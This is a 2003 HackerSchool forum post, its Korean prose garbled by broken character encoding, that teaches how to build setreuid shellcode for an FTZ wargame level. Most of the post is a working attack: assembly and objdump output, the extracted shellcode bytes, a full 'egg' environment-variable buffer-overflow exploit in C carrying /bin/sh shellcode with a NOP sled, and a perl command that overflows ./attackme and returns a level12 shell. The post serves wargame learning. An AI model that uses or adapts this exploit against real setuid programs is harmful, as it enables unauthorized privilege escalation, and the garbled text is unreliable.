http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=681 [º¹»ç]
>shellcode Á¦ÀÛÇÏ´Â ¹æ¹ýÀ» ¾Ë°í ½ÍÀºµ¥¿ä...
>¿©±âÀú±â ã°í °øºÎÇÏ°í´Â Àִµ¥..
>¾î¼À´É·ÂÀÌ ºÎÁ·Çϼ ¸·È÷³×¿ä...
>level19 ¿¡¼ setreuid()ÀÇ shellcode¸¦ ¸¸µé°í ÀÖ½À´Ï´Ù.
>
>shellcode¿¡ ´ëÇÏ¿© °øºÎÇÒ ¼ö ÀÖ´Â °÷À̳ª
>ÀÚ·á°¡ ÀÖ´Â °÷ÀÌ ÀÖÀ¸¸é ¾Ë·ÁÁÖ½Ã¸é °í¸¿°Ú½À´Ï´Ù.....
>
>........ÇØÅ·¿¡ ¾î¼ÀÀÌ Çʼö¿´³ª¿ä?...^^;
°í»ý°í»ý ÇÏ´Ù°¡......ÁÁÀº ÀÚ·á°¡ Àֱ淡 ..¿Ã·Áº¾´Ï´Ù...½©Äڵ嶫¿¡ °í»ýÇϽô ºÐµé.....µµ¿òÀÌ µÇ¼ÌÀ¸¸é ÇÕ´Ï´Ù....
http://ttongfly.net ¿¡ "night´ÔÀÇ setreuid() ½©ÄÚµå ¸¸µé±â" ÀÔ´Ï´Ù..
¹«´ÜÀ¸·Î ¿Ã·Áµµ µÇ´ÂÁö....^^;
======================================================================
È£¿íÀÌÀÇ ÇãÁ¢½º·¯¿î ½©ÄÚµå ¸¸µé±â
0x01. ¼·Ð
0x02. º»·Ð -step1, 2
~¼·Ð.
³»°¡ ¿äÁò¿¡ ±è¼±¿ì ¶ó´Â ÀÛÀÚ ¶§¹®¿¡ HackerSchool ·¹º§À» ´Ù½Ã ½ÃÀÛÇϰԵǾú´Ù. ÇÏÁö¸¸ ÀÌ°Ô ¹«½¼ ÀÏÀΰ¡? ¿¹Àü¿¡
Ç®¾ú´ø ¹®Á¦°¡ ¾È Ç®¾îÁö´Â°Ô ¾Æ´Ñ°¡.. Á» Â¥ÁõÀÌ ³µ´Ù. À߸ø ÇÏÁöµµ ¾Ê¾Ò°í, ½©µµ Á¦´ë·Î ¶³¾îÁö´Âµ¥
¿Ö? °ð ±è¼±¿ì¶ó´Â ³ðÀÌ ¾Ë·ÁÁÖ´õ¶ó.. ±×¸®°í ½ÅÁ¤ÈÆ ´ÔÀÌ Á¦ÀÛÇϽŠsetreuid(3092, 3092) ÀÇ
½©Äڵ带 °®°í ¿Í¼ Åë°úÇÏ´õ±º.. ÇÏÁö¸¸ ¿ì¸° ¸·Çû´Ù. ·¹º§12->13 Àº ¾î¶»°Ô Åë°ú ÇÒ °ÍÀΰ¡? ±×·¡¼ Á÷Á¢
¸¸µé¾îº¸±â·Î Çß´Ù. ±×¸®°í ¼º°øÇß´Ù. ¾ÆÁ÷ ±âÃÊÀûÀÎ ´Ü°èÁö¸¸ ±â»¼´Ù. Âü°í·Î ÀÌ ¹®¼´Â ¿À·ù °¡
¾ö.û.³ª.°Ô ¸¹´Ù. ³Ê±×·´°Ô °íÃÄÁֱ⠹ٶõ´Ù.
~º»·Ð.
step 1. assembly programming
³ ´Ù¸¥ °÷À¸·Î ¿¹Á¦¸¦ º¸¸é¼ ÇÏ´Â°É ½È¾îÇÑ´Ù..(¸øÇÏ´Â °Å´Ù »ç½Ç) ¿©ÇÏÆ°, ½©ÄÚµå ¸¦ Á¦ÀÛÇÏ·Á¸é assembly
¿¡ ´ëÇÑ ¾ÆÁÖ ±âº»Áö½ÄÀº ÀÖ¾î¾ßÇÑ´Ù. ¿ì¼± °¢ ·¹Áö½ºÅÍÀÇ °ªÀ» ¾Ë¾Æ³»°í.. ÇÔ¼öÀÇ °íÀ¯¹øÈ£ ¾Ë¾Æ³»°í..
ÀÎÅÍ·´Æ® È£ÃâÇÏ°í.. ¿©±â¼ ·¹Áö½ºÅͶó ÇÔÀº eax, ebx, ecx.... ÀÌ´Ù.
¿¹)
main()
{
setreuid(3092, 3092);
}
¿©±â¼ º¸¸é
eax ¿¡´Â setreuid °¡ µé¾î°¡°í..
ebx ¿¡´Â 3092
ecx ¿¡µµ 3092
ÀÌ·± ½ÄÀ¸·Î µé¾î°£´Ù. ÁÖ·Î eax ´Â ÇÔ¼öÀÇ °íÀ¯¹øÈ£¸¦ È£Ãâ ÇÒ¶§ ¾²¿© Áö´Â°Í ¾Ë°íÀÖ´Ù. ¾Æ´Ò¼öµµ? (system call)
³»°¡ ÀÌ°É ¾µ Áö½ÄÀÌ ¾È µÈ´Ù..
[level11@ftz tmp]$ cat > a.c
main()
{
setreuid(3092, 3902);
}
ÀÌ°É ¾î¼Àºí¸®¾î·Î ÇÁ·Î±×·¡¹ÖÇÏ¸é ´ë·« ÀÌ·¸´Ù.
xor %eax, %eax // eax 0 À¸·Î ÃʱâÈ
mov $0x14, %al
mov $0xc, %ah // eax ÀÇ ºÎºÐ(¸Â³ª?, al ah) ¿¡ c14 ¸¦ ³Ö¾îÁØ´Ù. c14´Â 3092 ÀÇ 16Áø¼ö´Ù.
mov %eax, %ebx
mov %ebx, %ecx // ebx ¿Í ecx ¸¦ c14(3092 ·Î ÅëÀϽÃÄÑÁØ´Ù)
xor %eax, %eax // eax ´Ù½Ã ÃʱâÈ
mov $0x46, %eax // setreuid ÀÇ °íÀ¯¹øÈ£ÀÎ 70ÀÇ 16Áø¼ö. 46
int $0x80 // ÀÎÅÍ·´Æ®È£Ãâ.
À§ÀÇ al, ah Àº °¢°¢ 1byte ÀÌ´Ù.^^ (»ç½Ç ÇÊÀÚµµ È®½ÇÈ÷ ¸ð¸§.)
ÀúÀ§ÀÇ assembly ÄÚµå´Â C ÀÇ
setreuid(3092, 3092); ÀÇ ÄÚµå¿Í °°´Ù.
eax ebx ecx
»ý°¢Çغ¸¸é º°·Î ¾î·Á¿î °Íµµ ¾Æ´Ï´Ù. ÇÏÁö¸¸ ¾î¼Àºí¸®¾îÀÇ ±âº»Áö½ÄÀº ÀÖ¾î¾ßÇÑ´Ù.
(ÇÊÀÚ´Â ¾ø´Ù. ´ëÃæ ÇÊ¿äÇÑ ¸í·ÉµéÀ» Àá½Ã ¿Ü¿öµÐ°Å»ÓÀÌ´Ù.)
step 2. shellcode ¸¸µé±â
À§¿¡¼ ¸¸µç Äڵ带 °¬°í ÀÌ·± ½ÄÀ¸·Î ÄÄÆÄÀÏ ÇÑ´Ù.
[level11@ftz tmp]$ cat > setreuid.c
main(){
__asm__("
xor %eax, %eax
mov $0x14, %al
mov $0xc, %ah
mov %eax, %ebx
mov %ebx, %ecx
xor %eax, %eax
mov $0x46, %al
int $0x80
");
}
[level11@ftz tmp]$ gcc -o setreuid setreuid.c -mpreferred-stack-boundary=2
-mpreferred-stack-boundary=2 ÀÇ ¶æÀº stack ÀÌ gcc 2.91 ÀÏ ¶§ÀÇ ¸ð½ÀÀ¸·Î ÄÄÆÄÀÏ Ç϶õ ¶æÀÌ´Ù.
[level11@ftz tmp]$ objdump -d setreuid
setreuid: file format elf32-i386
... »ý·« ....
080483d0 <main>:
80483d0: 55 push %ebp
80483d1: 89 e5 mov %esp,%ebp
80483d3: 31 c0 xor %eax,%eax
80483d5: b0 14 mov $0x14,%al
80483d7: b4 0c mov $0xc,%ah
80483d9: 89 c3 mov %eax,%ebx
80483db: 89 d9 mov %ebx,%ecx
80483dd: 31 c0 xor %eax,%eax
80483df: b0 46 mov $0x46,%al
80483e1: cd 80 int $0x80
80483e3: 5d pop %ebp
80483e4: c3 ret
80483e5: 8d 76 00 lea 0x0(%esi),%esi
80483e8: 90 nop
80483e9: 90 nop
80483ea: 90 nop
80483eb: 90 nop
80483ec: 90 nop
80483ed: 90 nop
80483ee: 90 nop
80483ef: 90 nop
... »ý·« ...
ÀÌÁ¦ ³²Àº °Ç ½©ÄÚµå ¸¦ ÀúÀ§¿¡¼ »Ì±â¸¸ ÇÏ¸é µÈ´Ù. ÀúÀ§ÀÇ ¾²·¹±âµé¸¸ ¾à°£ Ä¡¿ì°í..
¿ì¸®°¡ ÁÖ¸ñ ÇؾߵɰÍÀº ÀÌ ºÎºÐÀÌ´Ù.
80483d3: 31 c0 xor %eax,%eax
80483d5: b0 14 mov $0x14,%al
80483d7: b4 0c mov $0xc,%ah
80483d9: 89 c3 mov %eax,%ebx
80483db: 89 d9 mov %ebx,%ecx
80483dd: 31 c0 xor %eax,%eax
80483df: b0 46 mov $0x46,%al
80483e1: cd 80 int $0x80
ÄÚµå¿Í ºñ½ÁÇÏÁö ¾ÊÀº°¡? ¶È°°´Ù. ±×Àú hex code ·Î Ãâ·Â ÇØÁØ°ÎÀÌ´Ù.
Àú±â¼ ½©ÄÚµå °¡ ³ª¿Â´Ù.
"\x31\xc0\xb0\x14\xb4\x0c\x89\xc3\x89\xd9\x31\xc0\xb0\x46\xcd\x80"
ÇÏÇÏ.. ÀÌ°É ±âÁ¶ ½©ÄÚµå ÀºÎºÐ ¿¡ Ãß°¡¸¸ ÇØÁÖ¸é µÈ´Ù.
Âü°í·Î Àú°Ç HackerSchool level12( setreuid(3092, 3092) ) ½©ÄÚµå´Ù.
½ÃÇèÇغ¸°Ú´Ù..^^
[level11@ftz tmp]$ cat > egg.c
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\x31\xc0\xb0\x14\xb4\x0c\x89\xc3\x89\xd9\x31\xc0\xb0\x46\xcd\x80" //added setreuid(3092, 3092) shellcode
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" // ±âÁ¸ shellcode
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/bin/bash");
}
[level11@ftz tmp]$ gcc -o egg egg.c
egg.c: In function `main':
egg.c:19: warning: return type of `main' is not `int'
[level11@ftz tmp]$ ./egg
Using address: 0xbffffab8
[level11@ftz tmp]$ cd ..
[level11@ftz level11]$ perl -e 'system "./attackme","123456789012345678901234567890123456789012345678901234567890123456 78901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345
678901234567890123456789012345678901234567890123456789012345678901234567890\xb8\xfa\xff\xbf"'
sh-2.05a$ id
uid=3092(level12) gid=3091(level11) groups=3091(level11)
sh-2.05a$
¼º°øÀÌ´Ù. ¸ñÇ¥´Þ¼º....^^
ÀоîÁֽŠ¸ðµç ºÐµé²² °¨»çÇÑ´Ù. µýÁö Çѹø¾¿ ²À ºÎŹÇÑ´Ù.. ¿åÀº»çÀý~
µµ¿ò Áֽźеé
n3wb13 ´Ô
sjh21a ´Ô
Âü°í¹®Çå
Willy ´ÔÀÇ *** How to make shellcode in linux for beginners ***
|
Hit : 5966 Date : 2003/11/25 07:10
|